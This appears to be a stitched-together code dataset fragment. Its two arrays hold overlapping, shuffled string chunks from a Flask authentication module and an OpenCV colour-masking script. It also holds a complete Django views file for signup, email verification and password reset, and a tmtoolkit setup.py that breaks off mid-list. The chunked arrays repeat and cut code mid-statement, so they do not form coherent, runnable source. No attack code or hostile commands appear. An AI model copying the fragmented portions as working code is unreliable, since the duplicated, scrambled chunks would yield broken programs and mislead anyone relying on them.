"render_template('user_registration.html', form=form) @login_required @app.route('/logout') def logout(): logout_user() return redirect(url_for('index')) @app.route('/login', methods=['GET', 'POST']) def",
"logout_user, login_required @app.before_first_request def initDB(*args, **kwargs): db.create_all() @app.route('/', methods=['GET']) @app.route('/index', methods=['GET']) def index():",
"methods=['GET', 'POST']) def login(): if current_user.is_authenticated: return redirect(url_for('index')) form = LoginForm() if form.validate_on_submit():",
"index(): return render_template('base.html') @app.route('/register', methods=['GET', 'POST']) def register(): form = RegisterForm() if form.validate_on_submit():",
"current_user, login_user, logout_user, login_required @app.before_first_request def initDB(*args, **kwargs): db.create_all() @app.route('/', methods=['GET']) @app.route('/index', methods=['GET'])",
"def initDB(*args, **kwargs): db.create_all() @app.route('/', methods=['GET']) @app.route('/index', methods=['GET']) def index(): return render_template('base.html') @app.route('/register',",
"def login(): if current_user.is_authenticated: return redirect(url_for('index')) form = LoginForm() if form.validate_on_submit(): student =",
"url_for, request from app import app, db from flask_sqlalchemy import sqlalchemy from app.forms",
"from flask import render_template, flash, redirect, url_for, request from app import app, db",
"methods=['GET', 'POST']) def register(): form = RegisterForm() if form.validate_on_submit(): acc = User(username=form.username.data, email=form.email.data,",
"User(username=form.username.data, email=form.email.data, firstname=form.firstname.data, lastname=form.lastname.data) acc.get_password(form.password2.data) db.session.add(acc) db.session.commit() return redirect(url_for('index')) return render_template('user_registration.html', form=form) @login_required",
"if current_user.is_authenticated: return redirect(url_for('index')) form = LoginForm() if form.validate_on_submit(): student = User.query.filter_by(username=form.username.data).first() if",
"form = RegisterForm() if form.validate_on_submit(): acc = User(username=form.username.data, email=form.email.data, firstname=form.firstname.data, lastname=form.lastname.data) acc.get_password(form.password2.data) db.session.add(acc)",
"flask import render_template, flash, redirect, url_for, request from app import app, db from",
"if form.validate_on_submit(): student = User.query.filter_by(username=form.username.data).first() if student is None or not student.check_password(form.password.data): flash('Not",
"lastname=form.lastname.data) acc.get_password(form.password2.data) db.session.add(acc) db.session.commit() return redirect(url_for('index')) return render_template('user_registration.html', form=form) @login_required @app.route('/logout') def logout():",
"register(): form = RegisterForm() if form.validate_on_submit(): acc = User(username=form.username.data, email=form.email.data, firstname=form.firstname.data, lastname=form.lastname.data) acc.get_password(form.password2.data)",
"from app import app, db from flask_sqlalchemy import sqlalchemy from app.forms import RegisterForm,",
"app import app, db from flask_sqlalchemy import sqlalchemy from app.forms import RegisterForm, LoginForm",
"redirect, url_for, request from app import app, db from flask_sqlalchemy import sqlalchemy from",
"'POST']) def register(): form = RegisterForm() if form.validate_on_submit(): acc = User(username=form.username.data, email=form.email.data, firstname=form.firstname.data,",
"@app.route('/logout') def logout(): logout_user() return redirect(url_for('index')) @app.route('/login', methods=['GET', 'POST']) def login(): if current_user.is_authenticated:",
"form.validate_on_submit(): acc = User(username=form.username.data, email=form.email.data, firstname=form.firstname.data, lastname=form.lastname.data) acc.get_password(form.password2.data) db.session.add(acc) db.session.commit() return redirect(url_for('index')) return",
"redirect(url_for('index')) @app.route('/login', methods=['GET', 'POST']) def login(): if current_user.is_authenticated: return redirect(url_for('index')) form = LoginForm()",
"a username or incorrect password!') return redirect(url_for('login')) login_user(student, remember=form.rememberme.data) return redirect(url_for('index')) return render_template('login.html',",
"db from flask_sqlalchemy import sqlalchemy from app.forms import RegisterForm, LoginForm from app.models import",
"acc.get_password(form.password2.data) db.session.add(acc) db.session.commit() return redirect(url_for('index')) return render_template('user_registration.html', form=form) @login_required @app.route('/logout') def logout(): logout_user()",
"or incorrect password!') return redirect(url_for('login')) login_user(student, remember=form.rememberme.data) return redirect(url_for('index')) return render_template('login.html', title='Login Page',",
"= User(username=form.username.data, email=form.email.data, firstname=form.firstname.data, lastname=form.lastname.data) acc.get_password(form.password2.data) db.session.add(acc) db.session.commit() return redirect(url_for('index')) return render_template('user_registration.html', form=form)",
"return render_template('user_registration.html', form=form) @login_required @app.route('/logout') def logout(): logout_user() return redirect(url_for('index')) @app.route('/login', methods=['GET', 'POST'])",
"import app, db from flask_sqlalchemy import sqlalchemy from app.forms import RegisterForm, LoginForm from",
"LoginForm from app.models import User from flask_login import current_user, login_user, logout_user, login_required @app.before_first_request",
"from flask_sqlalchemy import sqlalchemy from app.forms import RegisterForm, LoginForm from app.models import User",
"form = LoginForm() if form.validate_on_submit(): student = User.query.filter_by(username=form.username.data).first() if student is None or",
"from app.forms import RegisterForm, LoginForm from app.models import User from flask_login import current_user,",
"from app.models import User from flask_login import current_user, login_user, logout_user, login_required @app.before_first_request def",
"import current_user, login_user, logout_user, login_required @app.before_first_request def initDB(*args, **kwargs): db.create_all() @app.route('/', methods=['GET']) @app.route('/index',",
"logout(): logout_user() return redirect(url_for('index')) @app.route('/login', methods=['GET', 'POST']) def login(): if current_user.is_authenticated: return redirect(url_for('index'))",
"flash('Not a username or incorrect password!') return redirect(url_for('login')) login_user(student, remember=form.rememberme.data) return redirect(url_for('index')) return",
"acc = User(username=form.username.data, email=form.email.data, firstname=form.firstname.data, lastname=form.lastname.data) acc.get_password(form.password2.data) db.session.add(acc) db.session.commit() return redirect(url_for('index')) return render_template('user_registration.html',",
"return redirect(url_for('index')) @app.route('/login', methods=['GET', 'POST']) def login(): if current_user.is_authenticated: return redirect(url_for('index')) form =",
"flask_login import current_user, login_user, logout_user, login_required @app.before_first_request def initDB(*args, **kwargs): db.create_all() @app.route('/', methods=['GET'])",
"request from app import app, db from flask_sqlalchemy import sqlalchemy from app.forms import",
"login_user, logout_user, login_required @app.before_first_request def initDB(*args, **kwargs): db.create_all() @app.route('/', methods=['GET']) @app.route('/index', methods=['GET']) def",
"def index(): return render_template('base.html') @app.route('/register', methods=['GET', 'POST']) def register(): form = RegisterForm() if",
"app, db from flask_sqlalchemy import sqlalchemy from app.forms import RegisterForm, LoginForm from app.models",
"@app.route('/register', methods=['GET', 'POST']) def register(): form = RegisterForm() if form.validate_on_submit(): acc = User(username=form.username.data,",
"= LoginForm() if form.validate_on_submit(): student = User.query.filter_by(username=form.username.data).first() if student is None or not",
"methods=['GET']) def index(): return render_template('base.html') @app.route('/register', methods=['GET', 'POST']) def register(): form = RegisterForm()"
] |
[
"np.array([0, 42, 0]) high = np.array([179, 255, 255]) mask = cv2.inRange(hsv_frame, low, high)",
"= cv2.bitwise_and(frame, frame, mask=mask) #cv2.imshow(\"Frame\", frame) #cv2.imshow(\"Red\", red) #cv2.imshow(\"Blue\", blue) cv2.imshow(\"Green\", green) cv2.imshow(\"Yellow\",",
"= np.array([40, 255, 255]) yellow_mask = cv2.inRange(hsv_frame, low_yellow, high_yellow) yellow = cv2.bitwise_and(frame, frame,",
"Blue color low_blue = np.array([94, 80, 2]) high_blue = np.array([126, 255, 255]) blue_mask",
"cv2.imshow(\"Green\", green) cv2.imshow(\"Yellow\", yellow) #cv2.imshow(\"Result\", result) key = cv2.waitKey(1) if key == 27:",
"= cap.read() hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV) # Red color low_red = np.array([161, 155,",
"= np.array([25, 52, 72]) high_green = np.array([102, 255, 255]) green_mask = cv2.inRange(hsv_frame, low_green,",
"np.array([126, 255, 255]) blue_mask = cv2.inRange(hsv_frame, low_blue, high_blue) blue = cv2.bitwise_and(frame, frame, mask=blue_mask)",
"high = np.array([179, 255, 255]) mask = cv2.inRange(hsv_frame, low, high) result = cv2.bitwise_and(frame,",
"low_green = np.array([25, 52, 72]) high_green = np.array([102, 255, 255]) green_mask = cv2.inRange(hsv_frame,",
"high_green) green = cv2.bitwise_and(frame, frame, mask=green_mask) #yellow low_yellow = np.array([21, 39, 64]) high_yellow",
"Red color low_red = np.array([161, 155, 84]) high_red = np.array([179, 255, 255]) red_mask",
"red_mask = cv2.inRange(hsv_frame, low_red, high_red) red = cv2.bitwise_and(frame, frame, mask=red_mask) # Blue color",
"mask=yellow_mask) # Every color except white low = np.array([0, 42, 0]) high =",
"= cv2.bitwise_and(frame, frame, mask=blue_mask) # Green color low_green = np.array([25, 52, 72]) high_green",
"84]) high_red = np.array([179, 255, 255]) red_mask = cv2.inRange(hsv_frame, low_red, high_red) red =",
"red) #cv2.imshow(\"Blue\", blue) cv2.imshow(\"Green\", green) cv2.imshow(\"Yellow\", yellow) #cv2.imshow(\"Result\", result) key = cv2.waitKey(1) if",
"cap = cv2.VideoCapture(0) while True: _, frame = cap.read() hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)",
"low_red = np.array([161, 155, 84]) high_red = np.array([179, 255, 255]) red_mask = cv2.inRange(hsv_frame,",
"color low_green = np.array([25, 52, 72]) high_green = np.array([102, 255, 255]) green_mask =",
"= np.array([179, 255, 255]) mask = cv2.inRange(hsv_frame, low, high) result = cv2.bitwise_and(frame, frame,",
"mask=red_mask) # Blue color low_blue = np.array([94, 80, 2]) high_blue = np.array([126, 255,",
"Green color low_green = np.array([25, 52, 72]) high_green = np.array([102, 255, 255]) green_mask",
"cv2.COLOR_BGR2HSV) # Red color low_red = np.array([161, 155, 84]) high_red = np.array([179, 255,",
"low = np.array([0, 42, 0]) high = np.array([179, 255, 255]) mask = cv2.inRange(hsv_frame,",
"0]) high = np.array([179, 255, 255]) mask = cv2.inRange(hsv_frame, low, high) result =",
"= np.array([161, 155, 84]) high_red = np.array([179, 255, 255]) red_mask = cv2.inRange(hsv_frame, low_red,",
"80, 2]) high_blue = np.array([126, 255, 255]) blue_mask = cv2.inRange(hsv_frame, low_blue, high_blue) blue",
"np.array([94, 80, 2]) high_blue = np.array([126, 255, 255]) blue_mask = cv2.inRange(hsv_frame, low_blue, high_blue)",
"high_red = np.array([179, 255, 255]) red_mask = cv2.inRange(hsv_frame, low_red, high_red) red = cv2.bitwise_and(frame,",
"2]) high_blue = np.array([126, 255, 255]) blue_mask = cv2.inRange(hsv_frame, low_blue, high_blue) blue =",
"red = cv2.bitwise_and(frame, frame, mask=red_mask) # Blue color low_blue = np.array([94, 80, 2])",
"np.array([102, 255, 255]) green_mask = cv2.inRange(hsv_frame, low_green, high_green) green = cv2.bitwise_and(frame, frame, mask=green_mask)",
"# Every color except white low = np.array([0, 42, 0]) high = np.array([179,",
"color low_red = np.array([161, 155, 84]) high_red = np.array([179, 255, 255]) red_mask =",
"frame, mask=blue_mask) # Green color low_green = np.array([25, 52, 72]) high_green = np.array([102,",
"cv2.cvtColor(frame, cv2.COLOR_BGR2HSV) # Red color low_red = np.array([161, 155, 84]) high_red = np.array([179,",
"np.array([179, 255, 255]) mask = cv2.inRange(hsv_frame, low, high) result = cv2.bitwise_and(frame, frame, mask=mask)",
"155, 84]) high_red = np.array([179, 255, 255]) red_mask = cv2.inRange(hsv_frame, low_red, high_red) red",
"low_yellow = np.array([21, 39, 64]) high_yellow = np.array([40, 255, 255]) yellow_mask = cv2.inRange(hsv_frame,",
"cv2.inRange(hsv_frame, low, high) result = cv2.bitwise_and(frame, frame, mask=mask) #cv2.imshow(\"Frame\", frame) #cv2.imshow(\"Red\", red) #cv2.imshow(\"Blue\",",
"# Green color low_green = np.array([25, 52, 72]) high_green = np.array([102, 255, 255])",
"color low_blue = np.array([94, 80, 2]) high_blue = np.array([126, 255, 255]) blue_mask =",
"high_blue) blue = cv2.bitwise_and(frame, frame, mask=blue_mask) # Green color low_green = np.array([25, 52,",
"np.array([179, 255, 255]) red_mask = cv2.inRange(hsv_frame, low_red, high_red) red = cv2.bitwise_and(frame, frame, mask=red_mask)",
"yellow_mask = cv2.inRange(hsv_frame, low_yellow, high_yellow) yellow = cv2.bitwise_and(frame, frame, mask=yellow_mask) # Every color",
"cap.read() hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV) # Red color low_red = np.array([161, 155, 84])",
"frame, mask=yellow_mask) # Every color except white low = np.array([0, 42, 0]) high",
"= np.array([179, 255, 255]) red_mask = cv2.inRange(hsv_frame, low_red, high_red) red = cv2.bitwise_and(frame, frame,",
"cv2.inRange(hsv_frame, low_yellow, high_yellow) yellow = cv2.bitwise_and(frame, frame, mask=yellow_mask) # Every color except white",
"high_green = np.array([102, 255, 255]) green_mask = cv2.inRange(hsv_frame, low_green, high_green) green = cv2.bitwise_and(frame,",
"blue = cv2.bitwise_and(frame, frame, mask=blue_mask) # Green color low_green = np.array([25, 52, 72])",
"= cv2.inRange(hsv_frame, low, high) result = cv2.bitwise_and(frame, frame, mask=mask) #cv2.imshow(\"Frame\", frame) #cv2.imshow(\"Red\", red)",
"255]) blue_mask = cv2.inRange(hsv_frame, low_blue, high_blue) blue = cv2.bitwise_and(frame, frame, mask=blue_mask) # Green",
"Every color except white low = np.array([0, 42, 0]) high = np.array([179, 255,",
"np cap = cv2.VideoCapture(0) while True: _, frame = cap.read() hsv_frame = cv2.cvtColor(frame,",
"255, 255]) mask = cv2.inRange(hsv_frame, low, high) result = cv2.bitwise_and(frame, frame, mask=mask) #cv2.imshow(\"Frame\",",
"#cv2.imshow(\"Red\", red) #cv2.imshow(\"Blue\", blue) cv2.imshow(\"Green\", green) cv2.imshow(\"Yellow\", yellow) #cv2.imshow(\"Result\", result) key = cv2.waitKey(1)",
"mask = cv2.inRange(hsv_frame, low, high) result = cv2.bitwise_and(frame, frame, mask=mask) #cv2.imshow(\"Frame\", frame) #cv2.imshow(\"Red\",",
"high) result = cv2.bitwise_and(frame, frame, mask=mask) #cv2.imshow(\"Frame\", frame) #cv2.imshow(\"Red\", red) #cv2.imshow(\"Blue\", blue) cv2.imshow(\"Green\",",
"= np.array([21, 39, 64]) high_yellow = np.array([40, 255, 255]) yellow_mask = cv2.inRange(hsv_frame, low_yellow,",
"255, 255]) yellow_mask = cv2.inRange(hsv_frame, low_yellow, high_yellow) yellow = cv2.bitwise_and(frame, frame, mask=yellow_mask) #",
"cv2.inRange(hsv_frame, low_blue, high_blue) blue = cv2.bitwise_and(frame, frame, mask=blue_mask) # Green color low_green =",
"blue) cv2.imshow(\"Green\", green) cv2.imshow(\"Yellow\", yellow) #cv2.imshow(\"Result\", result) key = cv2.waitKey(1) if key ==",
"cv2.bitwise_and(frame, frame, mask=blue_mask) # Green color low_green = np.array([25, 52, 72]) high_green =",
"= cv2.inRange(hsv_frame, low_blue, high_blue) blue = cv2.bitwise_and(frame, frame, mask=blue_mask) # Green color low_green",
"# Red color low_red = np.array([161, 155, 84]) high_red = np.array([179, 255, 255])",
"color except white low = np.array([0, 42, 0]) high = np.array([179, 255, 255])",
"= cv2.VideoCapture(0) while True: _, frame = cap.read() hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV) #",
"high_blue = np.array([126, 255, 255]) blue_mask = cv2.inRange(hsv_frame, low_blue, high_blue) blue = cv2.bitwise_and(frame,",
"green_mask = cv2.inRange(hsv_frame, low_green, high_green) green = cv2.bitwise_and(frame, frame, mask=green_mask) #yellow low_yellow =",
"frame, mask=red_mask) # Blue color low_blue = np.array([94, 80, 2]) high_blue = np.array([126,",
"cv2.bitwise_and(frame, frame, mask=green_mask) #yellow low_yellow = np.array([21, 39, 64]) high_yellow = np.array([40, 255,",
"64]) high_yellow = np.array([40, 255, 255]) yellow_mask = cv2.inRange(hsv_frame, low_yellow, high_yellow) yellow =",
"cv2.bitwise_and(frame, frame, mask=red_mask) # Blue color low_blue = np.array([94, 80, 2]) high_blue =",
"255]) green_mask = cv2.inRange(hsv_frame, low_green, high_green) green = cv2.bitwise_and(frame, frame, mask=green_mask) #yellow low_yellow",
"as np cap = cv2.VideoCapture(0) while True: _, frame = cap.read() hsv_frame =",
"mask=green_mask) #yellow low_yellow = np.array([21, 39, 64]) high_yellow = np.array([40, 255, 255]) yellow_mask",
"yellow = cv2.bitwise_and(frame, frame, mask=yellow_mask) # Every color except white low = np.array([0,",
"39, 64]) high_yellow = np.array([40, 255, 255]) yellow_mask = cv2.inRange(hsv_frame, low_yellow, high_yellow) yellow",
"= cv2.bitwise_and(frame, frame, mask=yellow_mask) # Every color except white low = np.array([0, 42,",
"np.array([21, 39, 64]) high_yellow = np.array([40, 255, 255]) yellow_mask = cv2.inRange(hsv_frame, low_yellow, high_yellow)",
"white low = np.array([0, 42, 0]) high = np.array([179, 255, 255]) mask =",
"high_yellow = np.array([40, 255, 255]) yellow_mask = cv2.inRange(hsv_frame, low_yellow, high_yellow) yellow = cv2.bitwise_and(frame,",
"low_yellow, high_yellow) yellow = cv2.bitwise_and(frame, frame, mask=yellow_mask) # Every color except white low",
"= cv2.inRange(hsv_frame, low_yellow, high_yellow) yellow = cv2.bitwise_and(frame, frame, mask=yellow_mask) # Every color except",
"frame = cap.read() hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV) # Red color low_red = np.array([161,",
"np.array([161, 155, 84]) high_red = np.array([179, 255, 255]) red_mask = cv2.inRange(hsv_frame, low_red, high_red)",
"True: _, frame = cap.read() hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV) # Red color low_red",
"low_blue = np.array([94, 80, 2]) high_blue = np.array([126, 255, 255]) blue_mask = cv2.inRange(hsv_frame,",
"#cv2.imshow(\"Blue\", blue) cv2.imshow(\"Green\", green) cv2.imshow(\"Yellow\", yellow) #cv2.imshow(\"Result\", result) key = cv2.waitKey(1) if key",
"low_blue, high_blue) blue = cv2.bitwise_and(frame, frame, mask=blue_mask) # Green color low_green = np.array([25,",
"frame) #cv2.imshow(\"Red\", red) #cv2.imshow(\"Blue\", blue) cv2.imshow(\"Green\", green) cv2.imshow(\"Yellow\", yellow) #cv2.imshow(\"Result\", result) key =",
"_, frame = cap.read() hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV) # Red color low_red =",
"255, 255]) red_mask = cv2.inRange(hsv_frame, low_red, high_red) red = cv2.bitwise_and(frame, frame, mask=red_mask) #",
"= cv2.inRange(hsv_frame, low_red, high_red) red = cv2.bitwise_and(frame, frame, mask=red_mask) # Blue color low_blue",
"green = cv2.bitwise_and(frame, frame, mask=green_mask) #yellow low_yellow = np.array([21, 39, 64]) high_yellow =",
"except white low = np.array([0, 42, 0]) high = np.array([179, 255, 255]) mask",
"cv2.inRange(hsv_frame, low_red, high_red) red = cv2.bitwise_and(frame, frame, mask=red_mask) # Blue color low_blue =",
"mask=blue_mask) # Green color low_green = np.array([25, 52, 72]) high_green = np.array([102, 255,",
"frame, mask=mask) #cv2.imshow(\"Frame\", frame) #cv2.imshow(\"Red\", red) #cv2.imshow(\"Blue\", blue) cv2.imshow(\"Green\", green) cv2.imshow(\"Yellow\", yellow) #cv2.imshow(\"Result\",",
"high_yellow) yellow = cv2.bitwise_and(frame, frame, mask=yellow_mask) # Every color except white low =",
"frame, mask=green_mask) #yellow low_yellow = np.array([21, 39, 64]) high_yellow = np.array([40, 255, 255])",
"import numpy as np cap = cv2.VideoCapture(0) while True: _, frame = cap.read()",
"hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV) # Red color low_red = np.array([161, 155, 84]) high_red",
"blue_mask = cv2.inRange(hsv_frame, low_blue, high_blue) blue = cv2.bitwise_and(frame, frame, mask=blue_mask) # Green color",
"low_red, high_red) red = cv2.bitwise_and(frame, frame, mask=red_mask) # Blue color low_blue = np.array([94,",
"result = cv2.bitwise_and(frame, frame, mask=mask) #cv2.imshow(\"Frame\", frame) #cv2.imshow(\"Red\", red) #cv2.imshow(\"Blue\", blue) cv2.imshow(\"Green\", green)",
"# Blue color low_blue = np.array([94, 80, 2]) high_blue = np.array([126, 255, 255])",
"255]) yellow_mask = cv2.inRange(hsv_frame, low_yellow, high_yellow) yellow = cv2.bitwise_and(frame, frame, mask=yellow_mask) # Every",
"high_red) red = cv2.bitwise_and(frame, frame, mask=red_mask) # Blue color low_blue = np.array([94, 80,",
"255]) red_mask = cv2.inRange(hsv_frame, low_red, high_red) red = cv2.bitwise_and(frame, frame, mask=red_mask) # Blue",
"while True: _, frame = cap.read() hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV) # Red color",
"import cv2 import numpy as np cap = cv2.VideoCapture(0) while True: _, frame",
"green) cv2.imshow(\"Yellow\", yellow) #cv2.imshow(\"Result\", result) key = cv2.waitKey(1) if key == 27: break",
"cv2.VideoCapture(0) while True: _, frame = cap.read() hsv_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV) # Red",
"cv2.bitwise_and(frame, frame, mask=yellow_mask) # Every color except white low = np.array([0, 42, 0])",
"= np.array([126, 255, 255]) blue_mask = cv2.inRange(hsv_frame, low_blue, high_blue) blue = cv2.bitwise_and(frame, frame,",
"= cv2.inRange(hsv_frame, low_green, high_green) green = cv2.bitwise_and(frame, frame, mask=green_mask) #yellow low_yellow = np.array([21,",
"np.array([40, 255, 255]) yellow_mask = cv2.inRange(hsv_frame, low_yellow, high_yellow) yellow = cv2.bitwise_and(frame, frame, mask=yellow_mask)",
"255, 255]) green_mask = cv2.inRange(hsv_frame, low_green, high_green) green = cv2.bitwise_and(frame, frame, mask=green_mask) #yellow",
"= cv2.bitwise_and(frame, frame, mask=red_mask) # Blue color low_blue = np.array([94, 80, 2]) high_blue",
"low, high) result = cv2.bitwise_and(frame, frame, mask=mask) #cv2.imshow(\"Frame\", frame) #cv2.imshow(\"Red\", red) #cv2.imshow(\"Blue\", blue)",
"cv2 import numpy as np cap = cv2.VideoCapture(0) while True: _, frame =",
"255, 255]) blue_mask = cv2.inRange(hsv_frame, low_blue, high_blue) blue = cv2.bitwise_and(frame, frame, mask=blue_mask) #",
"42, 0]) high = np.array([179, 255, 255]) mask = cv2.inRange(hsv_frame, low, high) result",
"#cv2.imshow(\"Frame\", frame) #cv2.imshow(\"Red\", red) #cv2.imshow(\"Blue\", blue) cv2.imshow(\"Green\", green) cv2.imshow(\"Yellow\", yellow) #cv2.imshow(\"Result\", result) key",
"mask=mask) #cv2.imshow(\"Frame\", frame) #cv2.imshow(\"Red\", red) #cv2.imshow(\"Blue\", blue) cv2.imshow(\"Green\", green) cv2.imshow(\"Yellow\", yellow) #cv2.imshow(\"Result\", result)",
"= cv2.bitwise_and(frame, frame, mask=green_mask) #yellow low_yellow = np.array([21, 39, 64]) high_yellow = np.array([40,",
"= cv2.cvtColor(frame, cv2.COLOR_BGR2HSV) # Red color low_red = np.array([161, 155, 84]) high_red =",
"= np.array([0, 42, 0]) high = np.array([179, 255, 255]) mask = cv2.inRange(hsv_frame, low,",
"numpy as np cap = cv2.VideoCapture(0) while True: _, frame = cap.read() hsv_frame",
"= np.array([94, 80, 2]) high_blue = np.array([126, 255, 255]) blue_mask = cv2.inRange(hsv_frame, low_blue,",
"np.array([25, 52, 72]) high_green = np.array([102, 255, 255]) green_mask = cv2.inRange(hsv_frame, low_green, high_green)",
"52, 72]) high_green = np.array([102, 255, 255]) green_mask = cv2.inRange(hsv_frame, low_green, high_green) green",
"72]) high_green = np.array([102, 255, 255]) green_mask = cv2.inRange(hsv_frame, low_green, high_green) green =",
"cv2.inRange(hsv_frame, low_green, high_green) green = cv2.bitwise_and(frame, frame, mask=green_mask) #yellow low_yellow = np.array([21, 39,",
"255]) mask = cv2.inRange(hsv_frame, low, high) result = cv2.bitwise_and(frame, frame, mask=mask) #cv2.imshow(\"Frame\", frame)",
"#yellow low_yellow = np.array([21, 39, 64]) high_yellow = np.array([40, 255, 255]) yellow_mask =",
"= np.array([102, 255, 255]) green_mask = cv2.inRange(hsv_frame, low_green, high_green) green = cv2.bitwise_and(frame, frame,",
"cv2.bitwise_and(frame, frame, mask=mask) #cv2.imshow(\"Frame\", frame) #cv2.imshow(\"Red\", red) #cv2.imshow(\"Blue\", blue) cv2.imshow(\"Green\", green) cv2.imshow(\"Yellow\", yellow)",
"low_green, high_green) green = cv2.bitwise_and(frame, frame, mask=green_mask) #yellow low_yellow = np.array([21, 39, 64])"
] |
[
"# -*- coding: utf-8 -*- from datetime import datetime def utcnow(): return datetime.utcnow()",
"<reponame>robzzy/articles-service<gh_stars>0 # -*- coding: utf-8 -*- from datetime import datetime def utcnow(): return"
] |
# Registration/auth views: sign-up, email verification, password reset/update.
# Token verification and password updates are delegated to a separate service
# over HTTP (settings.EMAIL_VERIFICATION_URL / settings.PASSWORD_UPDATE_URL).
from django.shortcuts import render
from django.conf.urls import url
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_protect
from django.views.decorators.debug import sensitive_post_parameters
from django.views.decorators.cache import never_cache
from django import shortcuts
from django.conf import settings
from . import forms
import requests
import json
from django.http import Http404
from django.shortcuts import redirect
from django.contrib import messages


@sensitive_post_parameters()
@csrf_protect
@never_cache
def signup(request):
    if request.user.is_authenticated():  # callable style; a property on Django >= 1.10
        return shortcuts.redirect(settings.LOGIN_REDIRECT_URL)
    if request.method == 'POST':
        form = forms.UserCreationForm(request.POST)
        if form.is_valid():
            messages.success(request, 'Successfully created account. Please check your '
                                      'email to verify your account before logging in.')
            return shortcuts.redirect(settings.LOGIN_REDIRECT_URL)
    else:
        form = forms.UserCreationForm()
    return render(request, 'registration/signup.html', {'form': form})


def verify(request):
    # Confirms an email address by forwarding the ?token=... query parameter
    # to the verification endpoint; anything else is a 404.
    if request.GET.get('token') is not None:
        payload = {'token': request.GET.get('token')}
        headers = {'Content-type': 'application/json'}
        res = requests.post(settings.EMAIL_VERIFICATION_URL, data=json.dumps(payload), headers=headers)
        if res.status_code == 200:
            messages.success(request, 'Email Address Verified! Please log in.')
            return redirect('/auth/login')
    raise Http404()


def reset_password(request):
    if request.user.is_authenticated():
        return shortcuts.redirect(settings.LOGIN_REDIRECT_URL)
    if request.method == 'POST':
        form = forms.UserResetPasswordForm(request.POST)
        if form.is_valid():
            messages.success(request, "We have sent a password reset link. Please check your email.")
            return shortcuts.redirect(settings.LOGIN_REDIRECT_URL)
    else:
        form = forms.UserResetPasswordForm()
    return render(request, 'registration/reset_password.html', {'form': form})


@sensitive_post_parameters()
@csrf_protect
@never_cache
def password_update(request):
    if request.user.is_authenticated():
        return shortcuts.redirect(settings.LOGIN_REDIRECT_URL)
    if request.method == 'POST':
        form = forms.UserPasswordUpdateForm(request.POST)
        if form.is_valid():
            # The reset token rides in as the last path segment of the URL.
            token = request.path.rsplit('/', 1)[-1]
            password = form.cleaned_data['<PASSWORD>']  # field name redacted in the source
            payload = {'token': token, 'password': password}
            headers = {'Content-type': 'application/json'}
            res = requests.post(settings.PASSWORD_UPDATE_URL, data=json.dumps(payload), headers=headers)
            if res.status_code == 200:
                messages.success(request, "Password updated successfully. Please log in.")
            else:
                messages.error(request, "That reset link does not exist or has expired. "
                                        "Please request a new reset password link by going "
                                        "to the reset password page.")
            return redirect('/auth/login')
    else:
        form = forms.UserPasswordUpdateForm()
    return render(request, 'registration/password_update.html', {'form': form})
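The views above never name their routes, but password_update() reading the token from the tail of request.path implies URLs shaped roughly like the sketch below. This is an assumption, not the project's actual urls.py; the patterns and file layout are hypothetical:

# Hypothetical urls.py matching how the views consume their input.
from django.conf.urls import url
from . import views

urlpatterns = [
    url(r'^signup/$', views.signup),
    url(r'^verify/$', views.verify),                           # expects ?token=...
    url(r'^reset_password/$', views.reset_password),
    url(r'^password_update/(?:.+)$', views.password_update),   # token as last path segment
]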
# setup.py (tmtoolkit)
"""
tmtoolkit setuptools based setup module
"""

import os
from codecs import open
from setuptools import setup, find_packages

__title__ = 'tmtoolkit'
__version__ = '0.10.0'
__author__ = '<NAME>'
__license__ = 'Apache License 2.0'

GITHUB_URL = 'https://github.com/WZBSocialScienceCenter/tmtoolkit'

# Core dependencies, pinned to tested minor-version ranges.
DEPS_BASE = ['numpy>=1.19.0,<2', 'scipy>=1.5.0,<1.6', 'pandas>=1.1.0,<1.2', 'xlrd>=1.2.0',
             'globre>=0.1.5,<0.2', 'matplotlib>=3.3.0,<3.4', 'spacy>=2.3.0,<2.4']

# Optional dependency groups, exposed via extras_require.
DEPS_EXTRA = {
    'datatable': ['datatable>=0.10.0,<0.11'],
    'nltk': ['nltk>=3.5.0,<3.6'],
    'excel_export': ['openpyxl>=3.0.0'],
    'wordclouds': ['wordcloud>=1.7.0,<1.8', 'Pillow>=7.2.0,<7.3'],
    'lda': ['ldafork>=1.2.0,<1.3'],
    'sklearn': ['scikit-learn>=0.23,<0.24'],
    'gensim': ['gensim>=3.8.0,<3.9'],
    'topic_modeling_eval_extra': ['gmpy2>=2.0.0,<3'],
    'test': ['pytest>=6.0.0,<7', 'hypothesis>=5.23.0,<5.24', 'decorator>=4.4.0,<4.5'],
    'doc': ['Sphinx>=3.1.0', 'sphinx-rtd-theme>=0.5.0', 'nbsphinx>=0.7.0'],
    'dev': ['coverage>=5.2', 'coverage-badge>=1.0.0', 'pytest-cov>=2.10.0', 'twine>=3.2.0',
            'ipython>=7.16.0', 'jupyter>=1.0.0', 'notebook>=6.0.0', 'tox>=3.18.0'],
}

# Two meta-extras: 'recommended' bundles the common add-ons, 'all' aggregates
# every group except the meta-extras themselves.
DEPS_EXTRA['recommended'] = DEPS_EXTRA['excel_export'] + DEPS_EXTRA['wordclouds']
DEPS_EXTRA['all'] = []
for k, deps in DEPS_EXTRA.items():
    if k not in {'recommended', 'all'}:
        DEPS_EXTRA['all'].extend(deps)

here = os.path.abspath(os.path.dirname(__file__))

# Get the long description from the README file
with open(os.path.join(here, 'README.rst'), encoding='utf-8') as f:
    long_description = f.read()

setup(
    name=__title__,
    version=__version__,
    description='Text Mining and Topic Modeling Toolkit',
    long_description=long_description,
    long_description_content_type='text/x-rst',
    url=GITHUB_URL,
    project_urls={
        'Bug Reports': GITHUB_URL + '/issues',
        'Source': GITHUB_URL,
    },
    author=__author__,
    author_email='<EMAIL>',
    license=__license__,
    classifiers=[
        'Development Status :: 4 - Beta',
        'Intended Audience :: Science/Research',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: Apache Software License',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Programming Language :: Python :: 3',
